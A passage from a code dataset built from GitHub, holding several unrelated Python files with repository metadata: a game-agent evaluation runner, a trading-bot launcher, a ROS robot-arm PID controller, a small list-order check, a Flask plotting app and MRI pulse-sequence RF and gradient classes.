p1(getAgentState(env), per1)\n elif list_other[pIdx] == 2:\n action, per2 = p2(getAgentState(env), per2)\n elif list_other[pIdx] == 3:\n action, per3 = p3(getAgentState(env), per3)\n allGame = False\n return winner, per_player\n if count < 0:\n return False, per_player\n\n\ndef n_games_normal(p0, num_game, per_player, list_other, per1, per2, per3, p1, p2, p3):\n win = 0\n for _ in range(num_game):\n np.random.shuffle(list_other)\n winner, per_player = one_game_normal(\n p0, list_other, per_player, per1, per2, per3, p1, p2, p3\n )\n win += winner\n return win, per_player\n\n\n@njit()\ndef n_games_numba(p0, num_game, per_player, list_other, per1, per2, per3, p1, p2, p3):\n win = 0\n for _ in range(num_game):\n np.random.shuffle(list_other)\n winner, per_player = one_game_numba(\n p0, list_other, per_player, per1, per2, per3, p1, p2, p3\n )\n win += winner\n return win, per_player\n\n\n# -----------------------------------------------------------------------------------\nimport importlib.util, json, sys\n\ntry:\n from env import SHORT_PATH\nexcept:\n pass\n\n\n@njit()\ndef bot_lv0(state, perData):\n validActions = getValidActions(state)\n arr_action = np.where(validActions == 1)[0]\n idx = np.random.randint(0, arr_action.shape[0])\n return arr_action[idx], perData\n\n\ndef load_module_player(player, game_name=None):\n if game_name == None:\n spec = importlib.util.spec_from_file_location(\n \"Agent_player\", f\"{SHORT_PATH}src/Agent/{player}/Agent_player.py\"\n )\n else:\n spec = importlib.util.spec_from_file_location(\n \"Agent_player\", f\"{SHORT_PATH}src/Agent/ifelse/{game_name}/{player}.py\"\n )\n module = importlib.util.module_from_spec(spec)\n sys.modules[spec.name] = module\n spec.loader.exec_module(module)\n return module\n\n\n@njit()\ndef check_run_under_njit(agent, perData):\n return True\n\n\ndef load_agent(level, *args):\n num_bot = getAgentSize() - 1\n\n if \"_level_\" not in globals():\n global _level_\n _level_ = level\n init = True\n else:\n if _level_ != level:\n _level_ = level\n init = True\n else:\n init = False\n\n if init:\n global _list_per_level_\n global _list_bot_level_\n _list_per_level_ = []\n _list_bot_level_ = []\n\n if _level_ == 0:\n _list_per_level_ = [\n np.array([[0.0]], dtype=np.float64) for _ in range(num_bot)\n ]\n _list_bot_level_ = [bot_lv0 for _ in range(num_bot)]\n else:\n env_name = sys.argv[1]\n if len(args) > 0:\n dict_level = json.load(\n open(f\"{SHORT_PATH}src/Log/check_system_about_level.json\")\n )\n else:\n dict_level = json.load(open(f\"{SHORT_PATH}src/Log/level_game.json\"))\n\n if str(_level_) not in dict_level[env_name]:\n raise Exception(\"Hiện tại không có level này\")\n\n lst_agent_level = dict_level[env_name][str(level)][2]\n lst_module_level = [\n load_module_player(lst_agent_level[i]) for i in range(num_bot)\n ]\n for i in range(num_bot):\n data_agent_level = np.load(\n f\"{SHORT_PATH}src/Agent/{lst_agent_level[i]}/Data/{env_name}_{level}/Train.npy\",\n allow_pickle=True,\n )\n _list_per_level_.append(\n lst_module_level[i].convert_to_test(data_agent_level)\n )\n _list_bot_level_.append(lst_module_level[i].Test)\n\n return _list_bot_level_, _list_per_level_\n\n\ndef run(\n p0: any = bot_lv0,\n num_game: int = 100,\n per_player: np.ndarray = np.array([[0.0]]),\n level: int = 0,\n *args,\n):\n num_bot = getAgentSize() - 1\n list_other = np.array([-1] + [i + 1 for i in range(num_bot)])\n try:\n check_njit = check_run_under_njit(p0, per_player)\n except:\n check_njit = False\n\n load_agent(level, *args)\n\n if check_njit:\n return n_games_numba(\n p0,\n num_game,\n per_player,\n list_other,\n _list_per_level_[0],\n _list_per_level_[1],\n _list_per_level_[2],\n _list_bot_level_[0],\n _list_bot_level_[1],\n _list_bot_level_[2],\n )\n else:\n return n_games_normal(\n p0,\n num_game,\n per_player,\n list_other,\n _list_per_level_[0],\n _list_per_level_[1],\n _list_per_level_[2],\n _list_bot_level_[0],\n _list_bot_level_[1],\n _list_bot_level_[2],\n )\n","repo_name":"ngoxuanphong/ENV","sub_path":"src/Base/Fantan/env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":17066,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"60"} +{"seq_id":"13025627239","text":"import tkinter as tk\nimport logging\nfrom connectors.bitmex_futures import get_contracts\nfrom connectors.binance_futures import BinanceFuturesClient\nimport config\nimport pprint\n\n\nlogger = logging.getLogger()\n\n# logger.debug(\"This message is important only when debugging the program\")\n# logger.info(\"This message just shows basic information\")\n# logger.warning(\"This message is about something you should pay attention to\")\n# logger.error(\"this message helps to debug an error that occurred in your program\")\n\nlogger .setLevel(logging.INFO)\n\nstream_handler = logging.StreamHandler()\nformatter = logging.Formatter(\"%(asctime)s %(levelname)s :: %(message)s\")\nstream_handler.setFormatter(formatter)\nstream_handler.setLevel(logging.INFO)\n\nfile_handler = logging.FileHandler('info.log')\nfile_handler.setFormatter(formatter)\nfile_handler.setLevel(logging.DEBUG)\n\nlogger.addHandler(stream_handler)\nlogger.addHandler(file_handler)\n\nif __name__ == '__main__':\n\n binanceObject = BinanceFuturesClient(config.BINANCE_KEY, config.BINANCE_SECRET, False)\n # binanceObject = BinanceFuturesClient(config.TESTNET_BINANCE_KEY, config.TESTNET_BINANCE_SECRET, True)\n # pprint.pprint(binanceObject.get_balance())\n\n root = tk.Tk()\n root.mainloop()\n\n","repo_name":"efunnuga-bamidele/Trading-Bot-v1.0","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"38345171443","text":"#!/usr/bin/env python\n\nimport sys\nimport copy\nimport rospy\nimport moveit_commander\nimport moveit_msgs.msg\nimport geometry_msgs.msg\nfrom math import pi\nfrom std_msgs.msg import String\nfrom moveit_commander.conversions import pose_to_list\nfrom datetime import datetime\n\nfrom matplotlib.animation import FuncAnimation\nfrom random import randrange\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport time\n\n\nfrom std_msgs.msg import Float64\n\nError = 0;\nprevious_error = 0; #previous error\nchange_y = 0;\nintegral = 0;\nderivative = 0;\n\ndesiredAngle = 0.00;\n\nx_data, y_data = [], []\n\n#figure = plt.figure()\n#line, = plt.plot_date(x_data, y_data, '-')\n\n\nKp = 0.02; \nKi = 0.001; \nKd = 0.0015; \nprogram_start=time.time()\n\ndef callback(data):\n\tglobal integral,Error, previous_error,change_y,derivative,desiredAngle,Kp,Ki,Kd\n\tglobal robot, move_group,scene,display_trajectory_publisher,program_start,wpose\n\t#rospy.loginfo(\"I heard %s\", data.data)\n\tactualAngle=data.data\n\tError=desiredAngle- actualAngle\n\tintegral=integral+Error\n\tderivative=Error-previous_error\n\tchange_y = (Kp * Error) + (Ki * integral) + (Kd * derivative) \n\t# Set Max Range for change_y and yout\n\n\t#wpose = move_group.get_current_pose().pose\n\t\t\n\tcurrent_y=0\n\t\n\tpose_goal = geometry_msgs.msg.Pose()\n\tpose_goal.orientation.x = wpose.orientation.x\n\tpose_goal.orientation.y = wpose.orientation.y\n\tpose_goal.orientation.z = wpose.orientation.z\n\tpose_goal.orientation.w = wpose.orientation.w\n\tpose_goal.position.x = wpose.position.x\n\tpose_goal.position.y = wpose.position.y+change_y\n\tpose_goal.position.z = wpose.position.z\n\tmove_group.set_pose_target(pose_goal)\n\t#move_group.set_named_target(\"test1\")\n\t\n\tplan = move_group.plan()\n\tmove_group.go(wait=True)\n\t# Calling `stop()` ensures that there is no residual movement\n\t#move_group.stop()\n\t# It is always good to clear your targets after planning with poses.\n\t# Note: there is no equivalent function for clear_joint_value_targets()\n\t#move_group.clear_pose_targets()\n\t#move_group.execute(plan, wait=True)\n\n\trospy.loginfo(change_y)\n\t#wpose2=move_group.get_current_pose().pose\n\t#print(wpose2)\n\n\tprevious_angle=actualAngle\n\tprevious_error=Error\n\t#figure = pyplot.figure()\n\n\t#time_instant=time.time()\n\t#time_var=int(time_instant-program_start)\n\t#plt.axis([0, time_var,-30, 30])\n\t#x_data.append(time_var)\n\t#y_data.append(data.data)\n\t#plt.plot(x_data, y_data)\n\t#plt.pause(0.0000001) #Note this correction\n\t#figure.gca().relim()\n\t#figure.gca().autoscale_view()\n\t#print data.data\n\t\n\t#plt.show()\n\t\n\n\n\n \ndef listener():\n\tglobal robot, move_group,scene,display_trajectory_publisher,wpose\n\n\trospy.init_node('controller', anonymous=True)\n\tmoveit_commander.roscpp_initialize(sys.argv)\n\trobot = moveit_commander.RobotCommander()\n\tscene = moveit_commander.PlanningSceneInterface()\n\tgroup_name = \"manipulator\"\n\tmove_group = moveit_commander.MoveGroupCommander(group_name)\n\t# Display trajectories in Rviz\n\tdisplay_trajectory_publisher = rospy.Publisher('/move_group/display_planned_path',moveit_msgs.msg.DisplayTrajectory,queue_size=20)\n\t#joint_goal = move_group.get_current_joint_values()\n\twpose = move_group.get_current_pose().pose\n\tprint(wpose)\n\trospy.Subscriber(\"/angle_topic\", Float64, callback)\n\t# spin() simply keeps python from exiting until this node is stopped\n\trospy.spin()\n\nif __name__ == '__main__':\n listener()","repo_name":"indraneelpatil/bottleneck_guided_rrt","sub_path":"abb_manipulator/scripts/controller.py","file_name":"controller.py","file_ext":"py","file_size_in_byte":3347,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"60"} +{"seq_id":"18158636655","text":"arr = list(map(int,input().split()))\n\nlist1 = [1,2,3,4,5,6,7,8]\nlist2 = [8,7,6,5,4,3,2,1]\n\nif list1 == arr:\n print('ascending')\nelif list2 == arr:\n print('descending')\nelse:\n print('mixed')\n","repo_name":"Kyun2da/Algorithm","sub_path":"python/baekjoon/2920.py","file_name":"2920.py","file_ext":"py","file_size_in_byte":199,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"34290561278","text":"from flask import Flask\nimport visualize\nimport io\nfrom flask import Response, render_template, request\nfrom matplotlib.backends.backend_agg import FigureCanvasAgg as FigureCanvas\n\n\"\"\"\nFlask web app displaying a scatter plot using the visualize module.\n\"\"\"\n\napp = Flask(__name__)\n\n@app.route('/')\ndef landing():\n return render_template('selection.html')\n\n@app.route(\"/selection\", methods=['POST'])\ndef selection():\n imgsrc = 'static/images/image.png'\n first = request.form['first']\n second = request.form['second']\n third = request.form['third']\n visualize.visualize(first,second,third)[0].savefig(imgsrc) \n return render_template('draw.html', imgsrc = imgsrc)\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)\n","repo_name":"Gaupemor/High-level_Python","sub_path":"assignment6/web_visualization.py","file_name":"web_visualization.py","file_ext":"py","file_size_in_byte":738,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"24970026072","text":"\"\"\"\nevent specific classes\n\n\"\"\"\nimport types\nimport typing\n\nimport matplotlib.pyplot as plt\nimport pypulseq as pp\n\nimport numpy as np\nimport rf_pulse_files as rfpf\nimport logging\nimport copy\n\nlogModule = logging.getLogger(__name__)\n\n\nclass Event:\n def __init__(self):\n self.t_duration_s: float = 0.0\n self.system: pp.Opts = NotImplemented\n\n def get_duration(self):\n raise NotImplementedError\n\n def to_simple_ns(self):\n raise NotImplementedError\n\n def copy(self):\n return copy.deepcopy(self)\n\n\nclass RF(Event):\n def __init__(self):\n super().__init__()\n self.flip_angle_deg: typing.Union[float, np.ndarray] = 0.0\n self.phase_deg: typing.Union[float, np.ndarray] = 0.0\n self.pulse_type: str = \"exc\"\n self.extRfFile: str = \"\"\n\n self.flip_angle_rad: typing.Union[float, np.ndarray] = self.flip_angle_deg / 180.0 * np.pi\n self.phase_rad: typing.Union[float, np.ndarray] = self.phase_deg / 180.0 * np.pi\n\n self.freq_offset_hz: float = 0.0\n self.phase_offset_rad: float = 0.0\n\n self.t_delay_s: float = 0.0\n self.t_ringdown_s: float = 0.0\n self.t_dead_time_s: float = 0.0\n self.t_array_s: np.ndarray = np.zeros(0)\n\n self.bandwidth_hz: float = 0.0\n self.time_bandwidth: float = 0.0\n\n self.signal: np.ndarray = np.zeros(0, dtype=complex)\n\n @classmethod\n def load_from_rfpf(cls, fname: str, flip_angle_rad: float, phase_rad: float, system: pp.Opts,\n duration_s: float = 2e-3, delay_s: float = 0.0, pulse_type: str = 'excitation'):\n rf_instance = cls()\n rf_instance.system = system\n rf = rfpf.RF.load(fname)\n rf_instance.extRfFile = fname\n rf_instance.pulse_type = pulse_type\n\n # get signal envelope\n signal = rf.amplitude * np.exp(1j * rf.phase)\n # calculate raster with assigned duration, we set the signal to be rastered on rf raster of 1 us\n delta_t = system.rf_raster_time\n t_array_s = rf_instance.set_on_raster(np.arange(0, int(duration_s * 1e6)) * 1e-6)\n # interpolate signal to new time\n signal_interp = np.interp(\n t_array_s,\n xp=np.linspace(0, duration_s, rf.num_samples),\n fp=signal\n )\n\n # normalise flip angle\n flip = np.sum(np.abs(signal_interp)) * delta_t * 2 * np.pi\n\n # assign values\n rf_instance.signal = signal_interp * flip_angle_rad / flip\n rf_instance.flip_angle_rad = flip_angle_rad\n rf_instance.flip_angle_deg = flip_angle_rad / np.pi * 180.0\n\n rf_instance.phase_rad = phase_rad\n rf_instance.phase_deg = phase_rad / np.pi * 180.0\n\n rf_instance.t_duration_s = duration_s\n rf_instance.time_bandwidth = rf.time_bandwidth\n rf_instance.bandwidth_hz = rf_instance.time_bandwidth / duration_s\n rf_instance.t_array_s = t_array_s\n\n rf_instance.t_delay_s = delay_s\n rf_instance.t_ringdown_s = system.rf_ringdown_time\n rf_instance.t_dead_time_s = system.rf_dead_time\n return rf_instance\n\n @classmethod\n def make_sinc_pulse(cls, flip_angle_rad: float, system: pp.Opts, phase_rad: float = 0.0,\n pulse_type: str = 'excitation',\n delay_s: float = 0.0, duration_s: float = 2e-3,\n freq_offset_hz: float = 0.0, phase_offset_rad: float = 0.0,\n time_bw_prod: float = 2):\n rf_instance = cls()\n rf_instance.system = system\n rf_simple_ns = pp.make_sinc_pulse(\n use=pulse_type,\n flip_angle=flip_angle_rad,\n delay=delay_s,\n duration=duration_s,\n freq_offset=freq_offset_hz,\n phase_offset=phase_offset_rad + phase_rad,\n return_gz=False,\n time_bw_product=time_bw_prod,\n system=system\n )\n rf_instance.flip_angle_deg = flip_angle_rad * 180.0 / np.pi\n rf_instance.phase_deg = phase_offset_rad * 180.0 / np.pi\n rf_instance.pulse_type = pulse_type\n rf_instance.extRfFile = \"\"\n\n rf_instance.flip_angle_rad = flip_angle_rad\n rf_instance.phase_rad = phase_rad\n\n rf_instance.freq_offset_hz = freq_offset_hz\n rf_instance.phase_offset_rad = phase_offset_rad\n\n rf_instance.t_delay_s = delay_s\n rf_instance.t_duration_s = duration_s\n rf_instance.t_ringdown_s = system.rf_ringdown_time\n rf_instance.t_dead_time_s = system.rf_dead_time\n rf_instance.t_array_s = rf_instance.set_on_raster(np.linspace(0, duration_s, rf_simple_ns.signal.shape[0]))\n\n rf_instance.bandwidth_hz = time_bw_prod / duration_s\n rf_instance.time_bandwidth = time_bw_prod\n\n rf_instance.signal = rf_simple_ns.signal\n rf_instance.system = system\n return rf_instance\n\n @classmethod\n def make_gauss_pulse(cls, flip_angle_rad: float, system: pp.Opts, phase_rad: float = 0.0,\n pulse_type: str = 'excitation',\n delay_s: float = 0.0, duration_s: float = 2e-3,\n freq_offset_hz: float = 0.0, phase_offset_rad: float = 0.0,\n time_bw_prod: float = 2):\n rf_instance = cls()\n rf_instance.system = system\n rf_simple_ns = pp.make_gauss_pulse(\n use=pulse_type,\n flip_angle=flip_angle_rad,\n delay=delay_s,\n duration=duration_s,\n freq_offset=freq_offset_hz,\n phase_offset=phase_offset_rad + phase_rad,\n return_gz=False,\n time_bw_product=time_bw_prod,\n system=system\n )\n rf_instance.flip_angle_deg = flip_angle_rad * 180.0 / np.pi\n rf_instance.phase_deg = phase_offset_rad * 180.0 / np.pi\n rf_instance.pulse_type = pulse_type\n rf_instance.extRfFile = \"\"\n\n rf_instance.flip_angle_rad = flip_angle_rad\n rf_instance.phase_rad = phase_rad\n\n rf_instance.freq_offset_hz = freq_offset_hz\n rf_instance.phase_offset_rad = phase_offset_rad\n\n rf_instance.t_delay_s = delay_s\n rf_instance.t_duration_s = duration_s\n rf_instance.t_ringdown_s = system.rf_ringdown_time\n rf_instance.t_dead_time_s = system.rf_dead_time\n rf_instance.t_array_s = rf_instance.set_on_raster(np.linspace(0, duration_s, rf_simple_ns.signal.shape[0]))\n\n rf_instance.bandwidth_hz = time_bw_prod / duration_s\n rf_instance.time_bandwidth = time_bw_prod\n\n rf_instance.signal = rf_simple_ns.signal\n rf_instance.system = system\n return rf_instance\n\n def get_duration(self):\n return self.t_delay_s + self.t_duration_s + self.t_ringdown_s\n\n def set_on_raster(self, input_value: typing.Union[int, float, np.ndarray]):\n is_single = isinstance(input_value, (int, float))\n if is_single:\n us_value = np.array(input_value) * 1e6\n else:\n us_value = 1e6 * input_value\n us_raster = 1e6 * self.system.rf_raster_time\n choice = us_value % us_raster\n us_value[choice < 1e-4] = us_value[choice < 1e-4]\n us_value[choice > 1e-4] = np.round(us_value[choice > 1e-4] / us_raster) * us_raster\n if is_single:\n return 1e-6 * us_value[0]\n else:\n return 1e-6 * us_value\n\n def to_simple_ns(self):\n return types.SimpleNamespace(\n use=self.pulse_type, dead_time=self.t_dead_time_s, delay=self.t_delay_s,\n freq_offset=self.freq_offset_hz, phase_offset=self.phase_offset_rad,\n ringdown_time=self.t_ringdown_s, shape_dur=self.t_duration_s,\n signal=self.signal, t=self.t_array_s,\n type='rf'\n )\n\n def calculate_center(self):\n \"\"\"\n calculate the central point of rf shape\n for now assume middle, but can extend to max\n \"\"\"\n return self.t_duration_s / 2\n\n def plot(self):\n fig = plt.figure()\n ax = fig.add_subplot()\n amplitude = np.abs(self.signal)\n phase = np.angle(self.signal) + self.phase_rad\n ax.plot(np.linspace(0, self.t_duration_s, self.signal.shape[0]), amplitude, label='amp')\n ax.plot(np.linspace(0, self.t_duration_s, self.signal.shape[0]), phase, label='phase')\n ax.legend()\n plt.show()\n\n\nclass GRAD(Event):\n def __init__(self):\n super().__init__()\n self.channel: str = 'z'\n self.amplitude: typing.Union[float, np.ndarray] = 0.0\n self.area: typing.Union[float,np.ndarray] = 0.0\n self.flat_area: float = 0.0\n\n self.t_array_s: np.ndarray = np.zeros(0)\n self.t_delay_s: float = 0.0\n self.t_fall_time_s = 1e-5\n self.t_rise_time_s = 1e-5\n self.t_flat_time_s = 1e-5\n\n self.system: pp.Opts = pp.Opts()\n\n self.max_slew: float = self.system.max_slew\n self.max_grad: float = self.system.max_grad\n\n # needed in this project for referencing slice select extended gradients. easy hack\n self.slice_select_amplitude: float = NotImplemented\n self.slice_select_duration: float = NotImplemented\n\n def set_on_raster(self, value: float, return_delay: bool = False, double: bool = True):\n raster_time = float(self.system.grad_raster_time)\n if double:\n # helps with maintaining raster when calculating esp\n raster_time *= 2.0\n if np.abs(value) % raster_time < 1e-9:\n rastered_value = value\n else:\n rastered_value = np.ceil(value / raster_time) * raster_time\n if not return_delay:\n return rastered_value\n else:\n delay = (rastered_value - value) / 2\n return rastered_value, delay\n\n @classmethod\n def make_trapezoid(cls, channel: str, system: pp.Opts, amplitude: float = 0.0, area: float = None,\n delay_s: float = 0.0, duration_s: float = 0.0,\n flat_area: float = 0.0, flat_time: float = -1.0,\n rise_time: float = 0.0):\n grad_instance = cls()\n grad_instance.system = system\n # some timing checks\n if flat_time > 1e-7:\n flat_time = grad_instance.set_on_raster(flat_time, double=False)\n if duration_s > 1e-7:\n duration_s = grad_instance.set_on_raster(duration_s, double=False)\n if rise_time > 1e-7:\n rise_time = grad_instance.set_on_raster(rise_time, double=False)\n\n grad_simple_ns = pp.make_trapezoid(\n channel=channel,\n amplitude=amplitude,\n area=area,\n delay=delay_s,\n duration=duration_s,\n flat_area=flat_area,\n flat_time=flat_time,\n rise_time=rise_time,\n system=system\n )\n grad_instance.channel = channel\n grad_instance.amplitude = np.array([\n 0.0, grad_simple_ns.amplitude,\n grad_simple_ns.amplitude, 0.0\n ])\n grad_instance.area = grad_simple_ns.area\n grad_instance.flat_area = grad_simple_ns.flat_area\n\n grad_instance.t_array_s = np.array([\n 0.0, grad_simple_ns.rise_time,\n grad_simple_ns.rise_time + grad_simple_ns.flat_time,\n grad_simple_ns.rise_time + grad_simple_ns.flat_time + grad_simple_ns.fall_time\n ])\n grad_instance.t_delay_s = delay_s\n grad_instance.t_fall_time_s = rise_time\n grad_instance.t_rise_time_s = rise_time\n grad_instance.t_flat_time_s = flat_time\n\n grad_instance.system = system\n\n grad_instance.max_slew = system.max_slew\n grad_instance.max_grad = system.max_grad\n grad_instance.t_duration_s = grad_instance.get_duration()\n return grad_instance\n\n @classmethod\n def make_slice_selective(\n cls, pulse_bandwidth_hz: float, slice_thickness_m: float, duration_s: float,\n system: pp.Opts, pre_moment: float = 0.0, re_spoil_moment: float = 0.0,\n rephase: float = 0.0, t_minimum_re_grad: float = 0.0, adjust_ramp_area: float = 0.0):\n \"\"\"\n create slice selective gradient with merged pre and re moments (optional)\n - one can set the minimum time for those symmetrical moments with t_minimum_re_grad to match other grad timings\n - the rephase parameter gives control over rephasing the slice select moment in the re-moment.\n It can be helpful to introduce correction factors: rephase = 1.0 will do\n conventional rephasing of half of the slice select area.\n From simulations it was found that eg. for one particular used slr pulse an increase of 8%\n gives better phase properties. hence one could use rephase=1.08.\n - adjust_ramp_area gives control over additional adjustments.\n In the jstmc implementation this is used to account for the ramp area of a successive slice select pulse\n \"\"\"\n\n # init\n grad_instance = cls()\n grad_instance.system = system\n duration_s, rf_raster_delay = grad_instance.set_on_raster(duration_s, return_delay=True)\n # set slice select amplitude\n amplitude = pulse_bandwidth_hz / slice_thickness_m\n amps = [0.0]\n times = [0.0]\n areas = []\n # set ramp times to max grad/ slew rate + 2%. could be optimized timing wise!\n t_ramp_unipolar = grad_instance.set_on_raster(1.02 * system.max_grad / system.max_slew)\n t_ramp_bipolar = grad_instance.set_on_raster(2.04 * system.max_grad / system.max_slew)\n t_minimum_re_grad = grad_instance.set_on_raster(t_minimum_re_grad)\n\n # calculations\n def get_area_asym_grad(amp_h: float, time_h: float, time_htol: float, time_0toh: float = t_ramp_unipolar,\n amp_l: float = amplitude) -> float:\n \"\"\"\n we want to calculate the area / moment from an assymetric gradient part\n \"\"\"\n area = 0.5 * time_0toh * amp_h + time_h * amp_h + 0.5 * (amp_h - amp_l) * time_htol + time_htol * amp_l\n return area\n\n def get_asym_grad_amplitude(\n duration: float, moment: float,\n t_asym_ramp: float = t_ramp_unipolar, t_zero_ramp: float = t_ramp_unipolar,\n asym_amplitude: float = amplitude) -> float:\n \"\"\"\n calculate the amplitude of re/pre gradient given ramp times to 0 and to the slice select amplitude,\n respectively and a duration\n \"\"\"\n return (moment - asym_amplitude * t_asym_ramp / 2) / (duration - t_asym_ramp / 2 - t_zero_ramp / 2)\n\n def get_asym_grad_min_duration(max_amplitude: float, moment: float,\n t_asym_ramp: float = t_ramp_unipolar, t_zero_ramp: float = t_ramp_unipolar,\n asym_amplitude: float = amplitude) -> (float, float):\n \"\"\"\n calculate the duration of the re/pre gradient given ramp times to 0 and slice select amplitude,\n respectively and a maximal re/pre gradient amplitude\n \"\"\"\n t_min_duration = grad_instance.set_on_raster(\n (moment - asym_amplitude * t_asym_ramp / 2) / max_amplitude + t_asym_ramp / 2 + t_zero_ramp / 2\n )\n if np.abs(get_area_asym_grad(\n amp_h=max_amplitude, time_h=t_min_duration - t_asym_ramp - t_zero_ramp,\n time_htol=t_asym_ramp, time_0toh=t_zero_ramp, amp_l=asym_amplitude)) - np.abs(moment) > 0:\n # absolute moment was increased, possibly due to np.ceil call in set raster time.\n # apparent prolonging of timing, we can pull it back by slight decreasing of amplitude\n max_amplitude = get_asym_grad_amplitude(\n duration=t_min_duration, moment=moment,\n t_asym_ramp=t_asym_ramp, t_zero_ramp=t_zero_ramp, asym_amplitude=asym_amplitude\n )\n return t_min_duration, max_amplitude\n\n # pre moment\n if np.abs(pre_moment) > 1e-7:\n # add to area array\n areas.append(pre_moment)\n # we assume moment of slice select and pre phaser to act in same direction\n if np.sign(pre_moment) != np.sign(amplitude):\n logModule.error(f\"pre-phase / spoil pre -- slice select not optimized for opposite sign grads\")\n # we can adopt here also with doubling the ramp times in case we have opposite signs\n # want to minimize timing of gradient - use max grad\n pre_grad_amplitude = np.sign(pre_moment) * system.max_grad\n duration_pre_grad, pre_grad_amplitude = get_asym_grad_min_duration(max_amplitude=pre_grad_amplitude,\n moment=pre_moment)\n if duration_pre_grad < t_minimum_re_grad:\n # stretch to minimum required time\n duration_pre_grad = t_minimum_re_grad\n pre_grad_amplitude = get_asym_grad_amplitude(duration=duration_pre_grad, moment=pre_moment)\n pre_t_flat = grad_instance.set_on_raster(duration_pre_grad - 2 * t_ramp_unipolar)\n amps.extend([pre_grad_amplitude, pre_grad_amplitude, amplitude])\n times.extend([t_ramp_unipolar, t_ramp_unipolar + pre_t_flat, duration_pre_grad])\n else:\n # ramp up only, no pre moment\n duration_pre_grad = grad_instance.set_on_raster(np.abs(amplitude / system.max_slew))\n times.append(duration_pre_grad)\n amps.append(amplitude)\n # flat part of slice select gradient. an rf would start here, hence save delay\n delay = times[-1] + rf_raster_delay\n amps.append(amplitude)\n times.append(duration_pre_grad + duration_s)\n areas.append(amplitude * duration_s)\n t = duration_pre_grad + duration_s\n re_start_time = t\n # re / spoil moment\n if np.abs(re_spoil_moment) > 1e-7:\n if np.sign(re_spoil_moment) != np.sign(amplitude):\n logModule.error(f\"pre-phase / spoil pre -- slice select not optimized for opposite sign grads\")\n # we can adopt here also with doubling the ramp times in case we have opposite signs\n t_ramp_asym = t_ramp_unipolar\n re_spoil_moment += - 0.5 * rephase * areas[-1]\n # very specific requirement jstmc sequence. adjust for ramp up of next slice selective gradient\n re_spoil_moment -= adjust_ramp_area\n if np.sign(re_spoil_moment) != np.sign(amplitude):\n # set up ramp for this case - just choose double the ramp time to account for complete gradient swing\n t_ramp_asym = t_ramp_bipolar\n areas.append(re_spoil_moment)\n if t_minimum_re_grad > 1e-6:\n # duration given - use symmetrical timing : same time as re gradient\n duration_re_grad = grad_instance.set_on_raster(t_minimum_re_grad)\n if t_ramp_unipolar > duration_re_grad:\n err = \"ramp times longer than available gradient time, slew rate limit\"\n logModule.error(err)\n raise ValueError(err)\n # we want to fit the pre moment into the given duration\n # i.e. ramp 0 to pre_amplitude, flat time, ramp pre_amplitude to amplitude\n re_grad_amplitude = get_asym_grad_amplitude(\n duration=duration_re_grad, moment=re_spoil_moment,\n t_asym_ramp=t_ramp_asym)\n # but if that exceeds grad limit we need to prolong the time\n if np.abs(re_grad_amplitude) > system.max_grad:\n re_grad_amplitude = np.sign(re_spoil_moment) * system.max_grad\n duration_re_grad, re_grad_amplitude = get_asym_grad_min_duration(\n max_amplitude=re_grad_amplitude, moment=re_spoil_moment, t_asym_ramp=t_ramp_asym)\n re_t_flat = grad_instance.set_on_raster(duration_re_grad - t_ramp_unipolar - t_ramp_asym)\n amps.extend([re_grad_amplitude, re_grad_amplitude])\n times.extend([t + t_ramp_asym, t + t_ramp_asym + re_t_flat])\n else:\n # want to minimize timing of gradient - use max grad\n re_grad_amplitude = np.sign(re_spoil_moment) * system.max_grad\n duration_re_grad, re_grad_amplitude = get_asym_grad_min_duration(\n max_amplitude=re_grad_amplitude, moment=re_spoil_moment, t_asym_ramp=t_ramp_asym\n )\n re_t_flat = grad_instance.set_on_raster(duration_re_grad - t_ramp_asym - t_ramp_unipolar)\n if re_t_flat > 1e-7:\n amps.extend([re_grad_amplitude, re_grad_amplitude])\n times.extend([t + t_ramp_asym, t + t_ramp_asym + re_t_flat])\n else:\n # can happen with small moments, since above calculations not take into account 0 flat time\n # we need to recalculate the gradient needed for only the ramps.\n re_grad_amplitude = amplitude\n ramp_time = grad_instance.set_on_raster(np.abs(re_spoil_moment * 2 / re_grad_amplitude))\n min_ramp_time = grad_instance.set_on_raster(np.abs(amplitude / system.max_slew))\n if min_ramp_time > ramp_time:\n warn = f\"rephasing area low, need only a ramp.\" \\\n f\"ramp slew rate too high, revert to maximal possible\" \\\n f\"-> can lead to slight deviations in ramp area! change spoiling gradient to avoid!\"\n logModule.warning(warn)\n ramp_time = min_ramp_time\n duration_re_grad = ramp_time\n t += duration_re_grad\n else:\n t += grad_instance.set_on_raster(np.abs(amplitude / system.max_slew))\n # ramp down\n amps.append(0.0)\n times.append(t)\n\n # end of re gradient\n re_end_time = t\n duration_re_grad = float(re_end_time - re_start_time)\n amps = np.array(amps)\n times = np.array(times)\n\n times = np.array(times)\n grad_instance.channel = 'z'\n grad_instance.amplitude = np.array(amps)\n grad_instance.area = np.array(areas)\n grad_instance.flat_area = np.zeros(3)\n\n grad_instance.t_array_s = times\n grad_instance.t_delay_s = 0.0\n grad_instance.t_fall_time_s = times[-1] - times[-2]\n grad_instance.t_rise_time_s = times[1] - times[0]\n grad_instance.t_flat_time_s = 0.0\n\n # for referencing slice selective part:\n grad_instance.slice_select_duration = duration_s\n grad_instance.slice_select_amplitude = amplitude\n\n grad_instance.system = system\n\n grad_instance.max_slew = system.max_slew\n grad_instance.max_grad = system.max_grad\n grad_instance.t_duration_s = grad_instance.get_duration()\n # last sanity check max grad / slew times\n if np.max(np.abs(amps)) > system.max_grad:\n err = f\"amplitude violation, maximum gradient exceeded\"\n logModule.error(err)\n raise ValueError(err)\n grad_slew = np.abs(np.diff(amps) / np.diff(times))\n if np.max(grad_slew) > system.max_slew:\n err = f\"slew rate violation, maximum slew rate exceeded\"\n logModule.error(err)\n raise ValueError(err)\n\n return grad_instance, delay, duration_re_grad\n\n @classmethod\n def sym_grad(cls, system: pp.Opts, channel: str = 'x', pre_delay: float = 0.0, area_lobe: float = 0.0,\n amplitude_lobe: float = 0.0, duration_lobe: float = 0.0, 